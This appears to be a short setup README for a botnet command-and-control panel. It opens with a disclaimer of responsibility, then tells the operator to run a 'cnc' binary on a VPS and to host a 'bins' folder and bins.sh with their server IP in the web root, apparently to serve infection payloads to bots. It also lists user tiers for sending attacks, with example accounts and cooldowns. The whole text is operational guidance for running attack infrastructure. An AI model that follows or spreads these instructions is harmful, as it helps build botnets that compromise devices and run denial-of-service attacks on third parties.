Urmommy does not take responsibilty for what you use this for

drag debug folder into the vps
run:
cd c2
chmod 777 cnc
screen ./cnc

Drag bins folder into /var/www/html
make sure YOUR server ip is in bins.sh

how to add a user:
user password common/arches/admin/owner boot-time cooldown expirey

free: same thing as common but cant change login information
common: send attacks no perms
arches: gets to see bot arches
admin: run all admin commands
owner: run all admin commands and owner commands ONLY GIVE OWNER TO PEOPLE YOU TRUST

ex:
owner owner123 owner 99999 0 99/99/9999
admin admin123 admin 999 0 99/99/9999
arches arches123 arches 200 30 10/20/2021
user user123 common 200 30 10/20/2021
free free123 free 200 30 10/20/2021